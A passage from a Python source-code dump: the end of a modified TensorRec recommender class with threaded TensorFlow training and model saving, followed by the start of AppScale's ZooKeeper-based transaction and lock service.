An object which inherits AbstractRepresentationGraph that contains a method to calculate item representations.
See tensorrec.representation_graphs for examples.
:param attention_graph: AbstractRepresentationGraph or None
Optional. An object which inherits AbstractRepresentationGraph that contains a method to calculate user
attention. Any valid repr_graph is also a valid attention graph. If None, no attention process will be applied.
:param prediction_graph: AbstractPredictionGraph
An object which inherits AbstractPredictionGraph that contains a method to calculate predictions from a pair of
user/item reprs.
See tensorrec.prediction_graphs for examples.
:param loss_graph: AbstractLossGraph
An object which inherits AbstractLossGraph that contains a method to calculate the loss function.
See tensorrec.loss_graphs for examples.
:param biased: bool
If True, a bias value will be calculated for every user feature and item feature.
"""
# Check TensorFlow version
major, minor, patch = tf.__version__.split(".")
if int(major) < 1 or int(major) == 1 and int(minor) < 7:
raise TfVersionException(tf_version=tf.__version__)
# Arg Check
if (n_components is None) or (n_tastes is None) or (user_repr_graph is None) or (item_repr_graph is None) \
or (prediction_graph is None) or (loss_graph is None):
raise ValueError("All arguments to TensorRec() must be non-None")
if n_components < 1:
raise ValueError("n_components must be >= 1")
if n_tastes < 1:
raise ValueError("n_tastes must be >= 1")
if not isinstance(user_repr_graph, AbstractRepresentationGraph):
raise ValueError("user_repr_graph must inherit AbstractRepresentationGraph")
if not isinstance(item_repr_graph, AbstractRepresentationGraph):
raise ValueError("item_repr_graph must inherit AbstractRepresentationGraph")
if not isinstance(prediction_graph, AbstractPredictionGraph):
raise ValueError("prediction_graph must inherit AbstractPredictionGraph")
if not isinstance(loss_graph, AbstractLossGraph):
raise ValueError("loss_graph must inherit AbstractLossGraph")
if attention_graph is not None:
if not isinstance(attention_graph, AbstractRepresentationGraph):
raise ValueError("attention_graph must be None or inherit AbstractRepresentationGraph")
if n_tastes == 1:
raise ValueError("attention_graph must be None if n_tastes == 1")
self.n_components = n_components
self.n_tastes = n_tastes
self.user_repr_graph_factory = user_repr_graph
self.item_repr_graph_factory = item_repr_graph
self.attention_graph_factory = attention_graph
self.prediction_graph_factory = prediction_graph
self.loss_graph_factory = loss_graph
self.biased = biased
self.stratified_sample = stratified_sample
self.log_interval = log_interval
self.logdir = logdir
self.graph_nodes = {}
self.memory_var = None
self.active_train_thread = None
self.neg_sample_limit = 100
self.truncate_interval=1000
self.coord = None
self.input_step_size = 1000
self.sub_process = []
self.queue_input = None
self.queue_output = None
self.queue_input_cap = 100
self.queue_output_cap = 100
self.gen_ex_n_worker = 1
self.tf_enqueue_n_worker = 1
self.tf_queue_cap = 1000
def _build_tf_graph(self, n_user_features, n_item_features, tf_learning_rate=0.01, tf_alpha=0.00001, margin=0.2, use_reg=False):
# Build placeholders
self.tf_learning_rate = tf.constant(tf_learning_rate, name='lr_rate') #tf.placeholder(tf.float32, None, name='learning_rate')
self.tf_alpha = tf.constant(tf_alpha, name='alpha') #tf.placeholder(tf.float32, None, name='alpha')
self.margin = tf.constant(margin, name='margin') #tf.placeholder(tf.float32, None, name='margin')
# self.negSearchLimit = tf.placeholder(tf.int32, None, name='negSearchLimit')
with tf.name_scope('feed_user_feature'):
self.tf_user_feature_cols = tf.placeholder(tf.int32, [None], name='tf_user_feature_cols')
with tf.name_scope('feed_interaction'):
self.tf_interaction_words_user = tf.placeholder(tf.int32, [None], name='tf_interaction_words_user')
self.tf_interaction_words_pos = tf.placeholder(tf.int32, [None], name='tf_interaction_words_pos')
with tf.name_scope('neg_example'):
self.tf_interaction_words_neg = tf.placeholder(tf.int32, [None], name='tf_interaction_words_neg')
self.tf_interaction_words_neg_len = tf.placeholder(tf.int32, [None], name='tf_interaction_words_neg_len')
# self.graph_nodes['test'] = tf.reduce_sum(self.tf_user_feature_cols) + tf.reduce_sum(self.tf_interaction_cols)
q = tf.PaddingFIFOQueue(capacity=self.tf_queue_cap, dtypes=[tf.int32, tf.int32, tf.int32, tf.int32, tf.int32],
shapes=[[None], [None], [None], [None], [self.neg_sample_limit]], name='padding_queue')
self.queue = q
enqueue_op = q.enqueue([self.tf_user_feature_cols, self.tf_interaction_words_user,
self.tf_interaction_words_pos, self.tf_interaction_words_neg,
self.tf_interaction_words_neg_len], name='enqueue')
self.graph_nodes['enqueue'] = enqueue_op
input_batch = q.dequeue(name='dequeue') # It replaces our input placeholder
user_features, words_user, words_pos, words_neg, words_neg_len = input_batch
self.graph_nodes['dequeue'] = input_batch
self.graph_nodes['q_size'] = q.size(name='q_size')
# Collect the vars for computing regulation
# item feature variable
_, item_weights = \
self.item_repr_graph_factory.connect_representation_graph(feature_weights=[self.graph_nodes.get('item_weights')],
tf_features=[0],
n_components=self.n_components,
n_features=n_item_features,
node_name_ending='item',
lookup=True)
#reg_vars.extend(item_weights)
self.graph_nodes['item_weights'] = item_weights[0]
self.tf_word_representation = item_weights[0]
print 'tf_word_representation', self.tf_word_representation
print 'item_weights', item_weights[0]
# user feature variable
user_weights = self.graph_nodes.get('user_weights')
tf_user_representation_feature, user_weights = self.user_repr_graph_factory.connect_representation_graph(
feature_weights=[user_weights],
tf_features=user_features, n_components=self.n_components, n_features=n_user_features,
node_name_ending='user', lookup=True)
self.graph_nodes['tf_user_representation_feature'] = tf_user_representation_feature
self.graph_nodes['user_weights'] = user_weights[0]
print 'tf_user_representation_feature', tf_user_representation_feature
print 'user_weights', user_weights[0]
with tf.name_scope('pos_example'):
pos_item_representation = tf.reshape(tf.reduce_sum(tf.nn.embedding_lookup(self.tf_word_representation, words_pos, name='pos_repr'), axis=0), shape=(1,-1))
self.graph_nodes['pos_item_representation'] = pos_item_representation
print 'pos_item_representation', pos_item_representation
# user representation
# user interation history representation
with tf.name_scope('final_user_repr'):
user_interaction_items_repr = tf.reduce_sum(tf.nn.embedding_lookup(self.tf_word_representation,
words_user,
name='lookup_interaction'), axis=0)
self.tf_user_representation = tf_user_representation_feature + user_interaction_items_repr
print 'user_interaction_items_repr', user_interaction_items_repr
print 'self.tf_user_representation', self.tf_user_representation
self.graph_nodes['tf_user_representation'] = self.tf_user_representation
self.graph_nodes['tf_user_representation_feature'] = tf_user_representation_feature
# negative examples
with tf.name_scope('neg_examples'):
neg_items = tf.split(words_neg, words_neg_len, name='neg_split')
neg_items_representation = tf.stack([tf.reduce_sum(tf.nn.embedding_lookup(self.tf_word_representation,words,name='lookup_neg'),
axis=0) for words in neg_items])
print 'neg_items_representation', neg_items_representation
self.graph_nodes['neg_item_representation'] = neg_items_representation
with tf.name_scope('words_cnt'):
self.graph_nodes['words_cnt'] = tf.shape(words_user)[0] + tf.shape(words_pos)[0] + tf.shape(words_neg)[0]
# Compose loss function args
# This composition is for execution safety: it prevents loss functions that are incorrectly configured from
# having visibility of certain nodes.
loss_graph_kwargs = {
'prediction_graph_factory': self.prediction_graph_factory,
'tf_user_representation': self.tf_user_representation,
'neg_items_representation': neg_items_representation,
'pos_item_representation': pos_item_representation,
'margin': self.margin,
'tr': self
}
# Build loss graph
with tf.name_scope('basic_loss'):
self.tf_basic_loss = self.loss_graph_factory.connect_loss_graph(**loss_graph_kwargs) / self.neg_sample_limit
with tf.name_scope('reg_loss'):
# reg_vars = [self.tf_user_representation, neg_items_representation, pos_item_representation]
reg_vars = [self.graph_nodes['item_weights'], self.graph_nodes['user_weights']]
self.tf_weight_reg_loss = self.tf_alpha * sum(tf.nn.l2_loss(weights) for weights in reg_vars)
self.graph_nodes['tf_weight_reg_loss'] = self.tf_weight_reg_loss
with tf.name_scope('loss'):
if use_reg:
print "using l2_reg of weights for part of loss"
self.tf_loss = self.tf_basic_loss + self.tf_weight_reg_loss
else:
self.tf_loss = self.tf_basic_loss
with tf.name_scope('optimizer'):
self.tf_optimizer = tf.train.AdamOptimizer(learning_rate=self.tf_learning_rate).minimize(self.tf_loss)
def trunc_norm(var, name_ending='var'):
with tf.name_scope('truc_'+name_ending):
norm = tf.norm(var, axis=1)
norm_truc = tf.maximum(norm, 1.0)
assign = tf.assign(var, var/tf.reshape(norm_truc, shape=(-1,1)))
return tf.reduce_sum(assign)
# do truncate norm like Starspace
with tf.name_scope('trunc_embeds'):
self.graph_nodes['truncat'] = tf.add(trunc_norm(self.graph_nodes['item_weights'], 'item_weights'),
trunc_norm(self.graph_nodes['user_weights'], 'user_weights'),
name='truncate_weights')
def fit(self, interactions, user_features, item_features, epochs=100, learning_rate=0.1, alpha=0.00001,
verbose=False, margin=0.2, negSearchLimit=100, train_threads=None, use_reg=False):
"""
Constructs the TensorRec graph and fits the model.
:param interactions: scipy.sparse matrix, tensorflow.data.Dataset, str, or list
A matrix of interactions of shape [n_users, n_items].
If a Dataset, the Dataset must follow the format used in tensorrec.input_utils.
If a str, the string must be the path to a TFRecord file.
If a list, the list must contain scipy.sparse matrices, tensorflow.data.Datasets, or strs.
:param user_features: scipy.sparse matrix, tensorflow.data.Dataset, str, or list
A matrix of user features of shape [n_users, n_user_features].
If a Dataset, the Dataset must follow the format used in tensorrec.input_utils.
If a str, the string must be the path to a TFRecord file.
If a list, the list must contain scipy.sparse matrices, tensorflow.data.Datasets, or strs.
:param item_features: scipy.sparse matrix, tensorflow.data.Dataset, str, or list
A matrix of item features of shape [n_items, n_item_features].
If a Dataset, the Dataset must follow the format used in tensorrec.input_utils.
If a str, the string must be the path to a TFRecord file.
If a list, the list must contain scipy.sparse matrices, tensorflow.data.Datasets, or strs.
:param epochs: Integer
The number of epochs to fit the model.
:param learning_rate: Float
The learning rate of the model.
:param alpha:
The weight regularization loss coefficient.
:param verbose: boolean
If true, the model will print a number of status statements during fitting.
:param user_batch_size: int or None
The maximum number of users per batch, or None for all users.
:param n_sampled_items: int or None
The number of items to sample per user for use in loss functions. Must be non-None if
self.loss_graph_factory.is_sample_based is True.
"""
start_time = time.time()
session = get_session()
self.neg_sample_limit = negSearchLimit
self.epochs = epochs
if verbose:
logging.info('Processing interaction and feature data')
# Check input dimensions
n_users, n_user_features = user_features.shape
n_items, n_item_features = item_features.shape
print 'n_users, n_user_features, n_items, n_item_features', n_users, n_user_features, n_items, n_item_features
self.n_users = n_users
user_features = user_features.tocsr()
interactions = interactions.tocsr()
item_features = item_features.tocsr()
item_dict = {i: item_features.indices[item_features.indptr[i]:item_features.indptr[i + 1]] for i in
range(item_features.shape[0])}
# Check if the graph has been constructed by checking the dense prediction node
# If it hasn't been constructed, initialize it
if self.memory_var is None:
print 'building tensorflow graph'
self.memory_var = tf.Variable(get_memory() / 1000000000, name='memory', trainable=False)
# Numbers of features are either learned at fit time from the shape of these two matrices or specified at
# TensorRec construction and cannot be changed.
self._build_tf_graph(n_user_features=n_user_features, n_item_features=n_item_features, use_reg=use_reg,
margin=margin, tf_learning_rate=learning_rate, tf_alpha=alpha)
print 'end building tensorflow graph'
queue_input_size = tf.py_func(lambda : get_queue_size(self.queue_input), inp=[], Tout=tf.int64)
queue_output_size = tf.py_func(lambda : get_queue_size(self.queue_output), inp=[], Tout=tf.int64)
session.run(tf.global_variables_initializer(), )
# Build the shared feed dict
# feed_dict = {self.tf_learning_rate: learning_rate,
# self.tf_alpha: calculate_batched_alpha(num_batches=n_users, alpha=alpha),
# self.margin: margin}
with tf.name_scope('log_item_weights'):
variable_summaries(self.graph_nodes['item_weights'], self.prediction_graph_factory.connect_dense_prediction_graph)
with tf.name_scope('log_user_weights'):
variable_summaries(self.graph_nodes['user_weights'])
with tf.name_scope('log_training'):
tf.summary.scalar('basic_loss', tf.reduce_mean(self.tf_basic_loss))
tf.summary.scalar('tf_weight_reg_loss', self.graph_nodes['tf_weight_reg_loss'])
tf.summary.scalar('loss', self.tf_loss)
tf.summary.scalar('memory', self.memory_var)
tf.summary.scalar('valid_neg_num', self.graph_nodes['valid_neg_num'])
tf.summary.scalar('words_cnt', self.graph_nodes['words_cnt'])
tf.summary.scalar('tf_queue_size', self.graph_nodes['q_size'])
tf.summary.scalar('preprocess_input_queue_size', queue_input_size)
tf.summary.scalar('preprocess_output_queue_size', queue_output_size)
merged = tf.summary.merge_all()
train_writer = tf.summary.FileWriter(self.logdir +'/'+time.strftime('%x-%X').replace('/','').replace(':',''),
session.graph,
max_queue=10, flush_secs=30)
coord = tf.train.Coordinator()
self.coord = coord
threads = []
self.queue_input, self.queue_output, self.sub_process = multiple_workers_thread(
lambda tid, q_in, q_out: self.get_train_example(tid, q_in, q_out,
user_features, interactions, item_dict, neg_sample_limit=100),
queue_capacity_input=self.queue_input_cap, queue_capacity_output=self.queue_output_cap, n_worker=self.gen_ex_n_worker)
gen_thread = threading.Thread(target=self.gen_user_id, args=(self.queue_input,), name='generate_user_id_thread')
enqueue_threads = [threading.Thread(target=self.enqueue_func, args=(self.queue_output,), name='enqueue tensorflow') for i in range(3)]
# self.active_train_thread += 1
for t in enqueue_threads: t.start()
gen_thread.start()
def train_worker(coord, session, tid):
step = 0
print '*** start running train_worker %s' % tid
while not coord.should_stop():
step += 1
if not verbose or step % self.log_interval or tid != 0:
session.run(self.tf_optimizer)
else:
_, _, loss, summary,q_size = session.run(
[self.memory_var.assign(get_memory() / 10**9), self.tf_optimizer, self.tf_basic_loss,
merged, self.graph_nodes['q_size']]
)
mean_loss = np.mean(loss)
train_writer.add_summary(summary, step)
out_str = '\ttrain: step = {} loss = {}, q_size = {}'.format( step, mean_loss, q_size)
print out_str
self.active_train_thread -= 1
print '--- stop train_worker thread %s ---' % tid
cpu_num = train_threads if train_threads else multiprocessing.cpu_count() - 1
print 'train thread number %s' % cpu_num
train_threads = [threading.Thread(target=train_worker, args=(coord,session,i)) for i in xrange(cpu_num)]
threads.extend(train_threads)
self.active_train_thread = cpu_num # training threads
for t in threads:
t.start()
for t in threads:
t.join()
gen_thread.join()
for t in enqueue_threads: t.join()
stop_subprocess(self.sub_process)
for p in self.sub_process:
p.join()
print '\n--- end of training---'
print 'used time %s' % (time.time() - start_time)
return 0
def gen_user_id(self, queue_input):
print '* start running gen_user_id, tid=%s' % thread.get_ident()
cnt = 0
session = get_session()
for epoch in range(self.epochs*100000):
users = range(self.n_users)
np.random.shuffle(users)
for u in users:
cnt += 1
if cnt % self.input_step_size == 0:
queue_size = session.run(self.graph_nodes['q_size'])
sys.stdout.write('\tgen_user_id: epoch %3s, cnt %8s, queue_size %3s \n' % (epoch, cnt, queue_size))
if cnt % self.truncate_interval == 0:
norm_sum, item_weights = session.run([self.graph_nodes['truncat'], self.graph_nodes['item_weights']])
print '\tafter truncatem norm_sum %s, min %s, max %s' % (norm_sum, np.min(item_weights), np.max(item_weights))
if self.active_train_thread is not None and self.active_train_thread == 0:
print '- end gen_user_id'
return
if epoch >= self.epochs:
self.coord.request_stop()
u = -1 # subprocess will stop for u < 0
# print 'gen uid %s' % u
try:
queue_input.put(u, timeout=10)
except Exception:
print 'enqueue uid timeout'
print '- end gen_user_id 2'
def enqueue_func(self, queue_output):
print '* start enqueue_func: feed tensorflow queue'
session = get_session()
cnt = 0
while self.active_train_thread != 0: # if this is not the only thread running
try:
ex = queue_output.get(timeout=5)
cnt += 1
if cnt % 1000 == 0:
print '\tenqueue_func %s, waiting %s' % (cnt, get_queue_size(queue_output))
# Set a 5-second timeout.
run_options = tf.RunOptions(timeout_in_ms=5000)
session.run(self.graph_nodes['enqueue'], options= run_options,
feed_dict={self.tf_user_feature_cols: ex[0],
self.tf_interaction_words_user: ex[1],
self.tf_interaction_words_pos: ex[2],
self.tf_interaction_words_neg: ex[3],
self.tf_interaction_words_neg_len: ex[4]})
except Exception as err:
print 'exception enqueue_func', err
print '- end enqueue_func'
def get_train_example(self, tid, queue_input, queue_output, user_features, interactions, item_dict, neg_sample_limit=100):
item_num = len(item_dict)
print '* start running get_train_example', tid
def get_input(u):
uf = user_features.indices[user_features.indptr[u]:user_features.indptr[u+1]]
ir = interactions.indices[interactions.indptr[u]:interactions.indptr[u+1]]
if len(ir)<2:
print 'interaction is not enough'
return None
pos_idx = np.random.randint(len(ir))
words_user = [x for x in itertools.chain.from_iterable([item_dict.get(item, []) for item in ir[pos_idx+1:].tolist()+ir[:pos_idx].tolist()])]
words_pos = item_dict.get(ir[pos_idx], [])
neg_items = filter(lambda l:len(l) > 0, [item_dict.get(x, []) for x in np.random.randint(item_num, size=neg_sample_limit+5)])[:neg_sample_limit]
if len(neg_items) != neg_sample_limit or len(words_user) == 0 or len(words_pos)==0 or len(uf) == 0:
# print "\t\tneg_item/words_user/words_pos has not enough words (%s,%s,%s,pos_idx=%s)" % (len(neg_items),len(words_user), len(words_pos), pos_idx)
return None
words_neg = [x for x in itertools.chain.from_iterable(neg_items)]
words_neg_len = [len(l) for l in neg_items]
return uf, words_user, words_pos, words_neg, words_neg_len
while self.active_train_thread != 0:
try:
u = queue_input.get(timeout=5)
if u<0:
break
# print 'tid %s, u %s' %(tid, u)
r = get_input(u)
if r:
# print 'tid %s, put example u %s' % (tid, u)
queue_output.put(r,timeout=5)
except Exception as err:
print 'get_train_example exception', err
print '- end get_train_input'
def save_model(self, directory_path):
"""
Saves the model to files in the given directory.
:param directory_path: str
The path to the directory in which to save the model.
:return:
"""
if not os.path.exists(directory_path):
os.makedirs(directory_path)
saver = tf.train.Saver()
session_path = os.path.join(directory_path, 'tensorrec_session.cpkt')
saver.save(sess=get_session(), save_path=session_path)
# Break connections to the graph before saving the python object
tensorrec_path = os.path.join(directory_path, 'tensorrec.pkl')
with open(tensorrec_path, 'wb') as file:
pickle.dump(file=file, obj=self)
@classmethod
def load_model(cls, directory_path):
"""
Loads the TensorRec model and TensorFlow session saved in the given directory.
:param directory_path: str
The path to the directory containing the saved model.
:return:
"""
graph_path = os.path.join(directory_path, 'tensorrec_session.cpkt.meta')
saver = tf.train.import_meta_graph(graph_path)
session_path = os.path.join(directory_path, 'tensorrec_session.cpkt')
saver.restore(sess=get_session(), save_path=session_path)
tensorrec_path = os.path.join(directory_path, 'tensorrec.pkl')
with open(tensorrec_path, 'rb') as file:
model = pickle.load(file=file)
return model
|
zktransaction.py
|
#!/usr/bin/python
"""
Distributed id and lock service for transaction support.
"""
import logging
import re
import sys
import threading
import time
import urllib
import kazoo.client
import kazoo.exceptions
class ZKTimeoutException(Exception):
""" A special Exception class that should be thrown if a function is
taking longer than expected by the caller to run
"""
pass
# A list that indicates that the Zookeeper node to create should be readable
# and writable by anyone.
ZOO_ACL_OPEN = None
# The number of seconds to wait before we consider a transaction to be failed.
TX_TIMEOUT = 30
# The number of seconds to wait between invocations of the transaction
# garbage collector.
GC_INTERVAL = 30
# The default port that ZooKeeper runs on.
DEFAULT_PORT = 2181
# The host and port that the Zookeeper service runs on, if none is provided.
DEFAULT_HOST = 'localhost:{}'.format(DEFAULT_PORT)
# The value that we should set for paths whose value we don't care about.
DEFAULT_VAL = "default"
# Paths are separated by this for the tree structure in zookeeper.
PATH_SEPARATOR = "/"
# This is the path which contains the different application's lock meta-data.
APPS_PATH = "/appscale/apps"
# This path contains different transaction IDs.
APP_TX_PATH = "txids"
# This is the node which holds all the locks of an application.
APP_LOCK_PATH = "locks"
APP_ID_PATH = "ids"
APP_TX_PREFIX = "tx"
APP_LOCK_PREFIX = "lk"
APP_ID_PREFIX = "id"
# This is the prefix of all keys which have been updated within a transaction.
TX_UPDATEDKEY_PREFIX = "ukey"
# This is the name of the leaf. It holds a list of locks as a string.
TX_LOCK_PATH = "lockpath"
# The path for blacklisted transactions.
TX_BLACKLIST_PATH = "blacklist"
# This is the path name for valid versions of entities used in a transaction.
TX_VALIDLIST_PATH = "validlist"
GC_LOCK_PATH = "gclock"
GC_TIME_PATH = "gclast_time"
# Lock path for the datastore groomer.
DS_GROOM_LOCK_PATH = "/appscale_datastore_groomer"
# Lock path for the datastore backup.
DS_BACKUP_LOCK_PATH = "/appscale_datastore_backup"
# Lock path for the datastore backup.
DS_RESTORE_LOCK_PATH = "/appscale_datastore_restore"
# A unique prefix for cross group transactions.
XG_PREFIX = "xg"
# Maximum number of groups allowed in cross group transactions.
MAX_GROUPS_FOR_XG = 25
# The separator value for the lock list when using XG transactions.
LOCK_LIST_SEPARATOR = "!XG_LIST!"
class ZKTransactionException(Exception):
""" ZKTransactionException defines a custom exception class that should be
thrown whenever there was a problem involving a transaction (e.g., the
transaction failed, we couldn't get a transaction ID).
"""
pass
class ZKInternalException(Exception):
""" ZKInternalException defines a custom exception class that should be
thrown whenever we cannot connect to ZooKeeper for an extended amount of time.
"""
pass
class ZKBadRequest(ZKTransactionException):
""" A class thrown when there are too many locks acquired in a XG transaction
or when XG operations are done on a non XG transaction.
"""
pass
class ZKTransaction:
""" ZKTransaction provides an interface that can be used to acquire locks
and other functions needed to perform database-agnostic transactions
(e.g., releasing locks, keeping track of transaction metadata).
"""
# The number of times we should retry ZooKeeper operations, by default.
DEFAULT_NUM_RETRIES = 0
# How long to wait before retrying an operation.
ZK_RETRY_TIME = .5
# The number of seconds to wait before we consider a zk call a failure.
DEFAULT_ZK_TIMEOUT = 3
# When we have this many failures trying to connect to ZK, abort execution.
MAX_CONNECTION_FAILURES = 10
def __init__(self, host=DEFAULT_HOST, start_gc=True):
""" Creates a new ZKTransaction, which will communicate with Zookeeper
on the given host.
Args:
host: A str that indicates which machine runs the Zookeeper service.
start_gc: A bool that indicates if we should start the garbage collector
for timed out transactions.
"""
logging.basicConfig(format='%(asctime)s %(levelname)s %(filename)s:' \
'%(lineno)s %(message)s ', level=logging.INFO)
logging.debug("Started logging")
# Connection instance variables.
self.needs_connection = True
self.failure_count = 0
self.host = host
self.handle = kazoo.client.KazooClient(hosts=host,
max_retries=self.DEFAULT_NUM_RETRIES, timeout=self.DEFAULT_ZK_TIMEOUT)
self.run_with_retry = self.handle.retry
try:
self.handle.start()
self.needs_connection = False
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
self.__counter_cache = {}
# for gc
self.gc_running = False
self.gc_cv = threading.Condition()
if start_gc:
self.start_gc()
def start_gc(self):
""" Starts a new thread that cleans up failed transactions.
If called when the GC thread is already started, this causes the GC thread
to reload its GC settings.
"""
logging.info("Starting GC thread")
with self.gc_cv:
if self.gc_running:
self.gc_cv.notifyAll()
else:
self.gc_running = True
self.gcthread = threading.Thread(target=self.gc_runner)
self.gcthread.start()
def stop_gc(self):
""" Stops the thread that cleans up failed transactions.
"""
logging.info("Stopping GC thread")
if self.gc_running:
with self.gc_cv:
self.gc_running = False
self.gc_cv.notifyAll()
self.gcthread.join()
logging.info("GC is done")
def close(self):
""" Stops the thread that cleans up failed transactions and closes its
connection to Zookeeper.
"""
logging.info("Closing ZK connection")
self.stop_gc()
self.handle.stop()
self.handle.close()
def increment_and_get_counter(self, path, value):
""" Increment a counter atomically.
Args:
path: A str of unique path to the counter.
value: An int of how much to increment the counter by.
Returns:
A tuple (int, int) of the previous value and the new value.
Raises:
ZKTransactionException: If it could not increment the counter.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
def clear_counter_from_cache():
""" Deletes a counter from the cache due to an exception being raised.
"""
if path in self.__counter_cache:
del self.__counter_cache[path]
try:
counter = None
if path in self.__counter_cache:
counter = self.__counter_cache[path]
else:
counter = self.handle.Counter(path)
self.__counter_cache[path] = counter
counter.__add__(value)
new_value = counter.value
return new_value - value, new_value
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
clear_counter_from_cache()
raise ZKTransactionException("Couldn't increment path {0} by value {1}" \
.format(path, value))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
clear_counter_from_cache()
raise ZKTransactionException(
"Couldn't increment path {0} with value {1}" \
.format(path, value))
def get_node(self, path, retries=5):
""" Fetch the ZooKeeper node at the given path.
Args:
path: A PATH_SEPARATOR-separated str that represents the node whose value
should be updated.
retries: The number of times to retry fetching the node.
Returns:
The value of the node.
Raises:
ZKInternalException: If there was an error trying to fetch the node.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
return self.run_with_retry(self.handle.get, path)
except kazoo.exceptions.NoNodeError:
return False
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
if retries > 0:
logging.info('Trying again to fetch node {} with retry #{}'
.format(path, retries))
time.sleep(self.ZK_RETRY_TIME)
return self.get_node(path, retries=retries - 1)
raise ZKInternalException('Unable to fetch node {}'.format(path))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
if retries > 0:
logging.info('Trying again to fetch node {} with retry #{}'
.format(path, retries))
time.sleep(self.ZK_RETRY_TIME)
return self.get_node(path, retries=retries - 1)
raise ZKInternalException('Unable to fetch node {}'.format(path))
def update_node(self, path, value):
""" Sets the ZooKeeper node at path to value, creating the node if it
doesn't exist.
Args:
path: A PATH_SEPARATOR-separated str that represents the node whose value
should be updated.
value: A str representing the value that should be associated with the
updated node.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
logging.debug("Updating node at {0}, with new value {1}".format(path,
value))
try:
self.run_with_retry(self.handle.set, path, str(value))
except kazoo.exceptions.NoNodeError:
try:
self.run_with_retry(self.handle.create, path, str(value), ZOO_ACL_OPEN,
makepath=True)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
except kazoo.exceptions.ZookeeperError as zoo_exception:
logging.exception(zoo_exception)
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
def delete_recursive(self, path):
""" Deletes the ZooKeeper node at path, and any child nodes it may have.
Args:
path: A PATH_SEPARATOR-separated str that represents the node to delete.
"""
if self.needs_connection or not self.handle.connected:
self.reestablish_connection()
try:
children = self.run_with_retry(self.handle.get_children, path)
for child in children:
self.delete_recursive(PATH_SEPARATOR.join([path, child]))
self.run_with_retry(self.handle.delete, path)
except kazoo.exceptions.NoNodeError:
pass
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
def dump_tree(self, path):
""" Prints information about the given ZooKeeper node and its children.
Args:
path: A PATH_SEPARATOR-separated str that represents the node to print
info about.
"""
try:
value = self.run_with_retry(self.handle.get, path)[0]
logging.info("{0} = \"{1}\"".format(path, value))
children = self.run_with_retry(self.handle.get_children, path)
for child in children:
self.dump_tree(PATH_SEPARATOR.join([path, child]))
except kazoo.exceptions.NoNodeError:
logging.info("{0} does not exist.".format(path))
except kazoo.exceptions.KazooException as kazoo_exception:
logging.exception(kazoo_exception)
self.reestablish_connection()
def get_app_root_path(self, app_id):
""" Returns the ZooKeeper path that holds all information for the given
application.
Args:
app_id: A str that represents the application we wish to get the root
path for.
Returns:
A str that represents a ZooKeeper node, whose immediate children are
the transaction prefix path and the locks prefix path.
"""
return PATH_SEPARATOR.join([APPS_PATH, urllib.quote_plus(app_id)])
def get_transaction_prefix_path(self, app_id):
""" Returns the location of the ZooKeeper node who contains all transactions
in progress for the given application.
Args:
app_id: A str that represents the application we wish to get all
transaction information for.
Returns:
A str that represents a ZooKeeper node, whose immediate children are all
of the transactions currently in progress.
"""
return PATH_SEPARATOR.join([self.get_app_root_path(app_id), APP_TX_PATH])
def get_txn_path_before_getting_id(self, app_id):
""" Returns a path that callers can use to get new transaction IDs from
ZooKeeper, which are given as sequence nodes.
Args:
app_id: A str that represents the application we wish to build a new
transaction path for.
Returns: A str that can be used to create new transactions.
"""
return PATH_SEPARATOR.join([self.get_transaction_prefix_path(app_id),
APP_TX_PREFIX])
def get_transaction_path(self, app_id, txid):
""" Returns the location of the ZooKeeper node who contains all information
for a transaction, and is the parent of the transaction lock list and
registered keys for the transaction.
Args:
app_id: A str that represents the application we wish to get the prefix
path for.
txid: An int that represents the transaction ID whose path we wish to
acquire.
"""
txstr = APP_TX_PREFIX + "%010d" % txid
return PATH_SEPARATOR.join([self.get_app_root_path(app_id), APP_TX_PATH,
txstr])
def get_transaction_lock_list_path(self, app_id, txid):
""" Returns the location of the ZooKeeper node whose value is a
XG_LIST-separated str, representing all of the locks that have been acquired
for the given transaction ID.
Args:
app_id: A str that represents the application we wish to get the
transaction information about.
txid: A str that represents the transaction ID we wish to get the lock
list location for.
Returns:
A PATH_SEPARATOR-delimited str corresponding to the ZooKeeper node that
contains the list of locks that have been taken for the given transaction.
"""
return PATH_SEPARATOR.join([self.get_transaction_path(app_id, txid),
TX_LOCK_PATH])
def get_blacklist_root_path(self, app_id):
""" Returns the location of the ZooKeeper node whose children are
all of the blacklisted transaction IDs for the given application ID.
Args:
app_id: A str corresponding to the application who we want to get
blacklisted transaction IDs for.
Returns:
A str corresponding to the ZooKeeper node whose children are blacklisted
transaction IDs.
"""
return PATH_SEPARATOR.join([self.get_transaction_prefix_path(app_id),
TX_BLACKLIST_PATH])
def get_valid_transaction_root_path(self, app_id):
""" Returns the location of the ZooKeeper node whose children are
all of the valid transaction IDs for the given application ID.
Args:
app_id: A str corresponding to the application who we want to get
valid transaction IDs for.
Returns:
A str corresponding to the ZooKeeper node whose children are valid
transaction IDs.
"""
return PATH_SEPARATOR.join([self.get_transaction_prefix_path(app_id),
TX_VALIDLIST_PATH])
def get_valid_transaction_path(self, app_id, entity_key):
""" Gets the valid transaction path with the entity key.
Args:
app_id: The application ID.
entity_key: The entity within the path.
Returns:
A str representing the transaction path.
"""
return PATH_SEPARATOR.join([self.get_valid_transaction_root_path(app_id),
urllib.quote_plus(entity_key)])
def get_lock_root_path(self, app_id, key):
""" Gets the root path of the lock for a particular app.
Args:
app_id: The application ID.
key: The key for which we're getting the root path lock.
Returns:
A str of the root lock path.
"""
return PATH_SEPARATOR.join([self.get_app_root_path(app_id), APP_LOCK_PATH,
urllib.quote_plus(key)])
def get_xg_path(self, app_id, tx_id):
""" Gets the XG path for a transaction.
Args:
app_id: The application ID whose XG path we want.
tx_id: The transaction ID whose XG path we want.
Returns:
A str representing the XG path for the given transaction.
"""
txstr = APP_TX_PREFIX + "%010d" % tx_id
return PATH_SEPARATOR.join([self.get_app_root_path(app_id), APP_TX_PATH,
